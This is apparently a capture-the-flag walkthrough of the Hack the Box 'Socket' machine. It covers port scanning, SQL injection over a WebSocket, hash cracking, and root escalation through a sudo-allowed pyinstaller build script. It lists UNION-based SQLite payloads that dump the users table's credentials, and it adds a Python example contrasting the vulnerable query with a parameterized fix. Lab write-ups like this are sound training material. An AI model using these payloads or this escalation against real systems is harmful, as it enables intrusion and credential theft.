In this post, I would like to share a walkthrough of the Socket machine from Hack the Box.
This machine is rated medium on Hack the Box.

Contents
What will you gain from the Socket machine?
For the user flag, you will need to download the Windows application and analyze its workflow, which deserves particular attention. We can also use the STEWS tool to gather some information on the potential vulnerability. We should obtain a credential by exploiting SQL injection over the WebSocket.
As for the root flag, you only need to abuse a bash script called build-installer.sh, which gives us a root shell.
Information Gathering on Socket Machine
Once we have started the VPN connection (the VPN configuration is downloaded from Hackthebox), we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
┌─[darknite@parrot]─[~/Document/htb/socket]
└──╼ $nmap -sC -sV 10.10.14.206 -oA intial
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-26 09:30 EDT
Nmap scan report for 10.129.193.144
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:a28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://qreader.htb/
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.85 seconds
From the Nmap result we obtained the domain of the website, qreader.htb.
┌─[darknite@parrot]─[~/Document/htb/socket]
└──╼ $nmap -p- -sC -sV 10.10.14.206 -oA full
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-26 09:33 EDT
Stats: 0:13:55 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
5789/tcp open unknown
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
| Date: Sun, 26 Mar 2023 13:56:07 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| Help, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Date: Sun, 26 Mar 2023 13:56:24 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Sun, 26 Mar 2023 13:56:08 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
|_ Failed to open a WebSocket connection: did not receive a valid HTTP request.
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1451.82 seconds
The full port scan reveals a new port, 5789, that we had not seen before, served by a Python websockets server. For now, let’s access the website interface.

The website interface shows that we can upload a file to have its QR code read.


We can download the QReader file to our attacker machine and unzip it, which lets us look into the folder.

As shown above, the file was built for Python 3.9.

Let’s decompile the pyc file back into Python source.

For that purpose, we will use the uncompyle6 tool.


If all requirements are met, we should be able to see the source.

However, don’t worry if we cannot see the source, because we have another method to analyze the website’s vulnerability: we found that it is vulnerable to vanilla CSWSH (Cross-Site WebSocket Hijacking).
Enumerate the WebSocket with SQL Injection

The source code looks something like the screenshot above.
Disclaimer: I didn’t code this Python code
1) '0.0.3" UNION SELECT group_concat(name),2,3,4 from sqlite_schema-- -'
2) '0.0.3" UNION SELECT sqlite_version(),2,3,4-- -'
3) '0.0.3" UNION SELECT 1,2,3,4-- -'
4) '0.0.3" UNION SELECT group_concat(answered_by),group_concat(answer),3,4 from answers-- -'
5) '0.0.3" UNION SELECT username,password,3,4 from users-- -'
The SQL payloads above are the ones we will use to obtain details, especially the username and password.
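As an added illustration (not code from the QReader application or from this post), here is the pattern behind those payloads beside its fix, on a constructed SQLite schema: the handler splices the client-supplied version into a double-quoted SQL literal, so a UNION through that field reads other tables; binding the value as a parameter and allow-listing its shape closes the hole. The table and column names other than users are assumptions.

```python
import json
import re
import sqlite3

# Constructed stand-in for the app's SQLite database; the real table
# names and columns are assumptions (only 'users' comes from the post).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE versions(id INTEGER, version TEXT, released TEXT, notes TEXT);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT, role TEXT);
        INSERT INTO versions VALUES (1, '0.0.2', '2022-01-01', 'initial');
        INSERT INTO versions VALUES (2, '0.0.3', '2022-06-01', 'bug fixes');
        INSERT INTO users VALUES (1, 'alice', '<constructed-hash>', 'admin');
    """)
    return db

# A WebSocket message like the app's version check, and one carrying the
# post's fifth payload in the version field (both constructed here).
BENIGN = json.dumps({"version": "0.0.3"})
INJECTED = json.dumps(
    {"version": '0.0.3" UNION SELECT username,password,3,4 from users-- -'})

def check_version_vulnerable(db, message):
    """Insecure pattern: the client value is spliced into a "..." literal.
    SQLite treats an unmatched double-quoted token as a string, so the
    payload closes it, appends a UNION and comments out the trailing quote."""
    version = json.loads(message)["version"]
    query = f'SELECT * FROM versions WHERE version = "{version}"'
    return db.execute(query).fetchall()

VERSION_RE = re.compile(r"\d+(\.\d+)*")

def check_version_safe(db, message):
    """Hardened handler: allow-list the shape of the field, then bind it
    as a parameter so it is never parsed as SQL."""
    version = json.loads(message)["version"]
    if not isinstance(version, str) or not VERSION_RE.fullmatch(version):
        return []
    return db.execute(
        "SELECT * FROM versions WHERE version = ?", (version,)).fetchall()

def leaked_usernames(rows):
    """Rows whose first column is a username rather than an integer id,
    i.e. data that came from the users table via the UNION."""
    return [r[0] for r in rows if isinstance(r[0], str)]
```

Running the vulnerable handler on INJECTED returns a users row alongside the versions row, while the hardened handler rejects the message and only answers the benign one.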

The result of the first SQL payload

The result of the second SQL payload

The result of the third SQL payload

The result of the fourth SQL payload

The result of the last SQL payload

Finally, we retrieved the hashes and tried to crack them using CrackStation.


We can also use hashcat to recover the password.

As a result, we successfully accessed the machine via SSH.


We can read the user flag with the “cat user.txt” command.
Escalate to Root Privileges Access

As usual, we look for a file we can abuse by running the “sudo -l” command.
(remote) tkeller@socket:/home/tkeller$ cat /usr/local/sbin/build-installer.sh
#!/bin/bash
if [ $# -ne 2 ] && [[ $1 != 'cleanup' ]]; then
  /usr/bin/echo "No enough arguments supplied"
  exit 1;
fi
action=$1
name=$2
ext=$(/usr/bin/echo $2 |/usr/bin/awk -F'.' '{ print $(NF) }')
if [[ -L $name ]];then
  /usr/bin/echo 'Symlinks are not allowed'
  exit 1;
fi
if [[ $action == 'build' ]]; then
  if [[ $ext == 'spec' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /home/svc/.local/bin/pyinstaller $name
    /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'make' ]]; then
  if [[ $ext == 'py' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /root/.local/bin/pyinstaller -F --name "qreader" $name --specpath /tmp
    /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'cleanup' ]]; then
  /usr/bin/rm -r ./build ./dist 2>/dev/null
  /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
  /usr/bin/rm /tmp/qreader* 2>/dev/null
else
  /usr/bin/echo 'Invalid action'
  exit 1;
fi
The script above runs pyinstaller as root on a file we supply, so we can use command injection through it to obtain a root shell.



We can execute the malicious command shown above.



We can read the root flag with the “cat root.txt” command.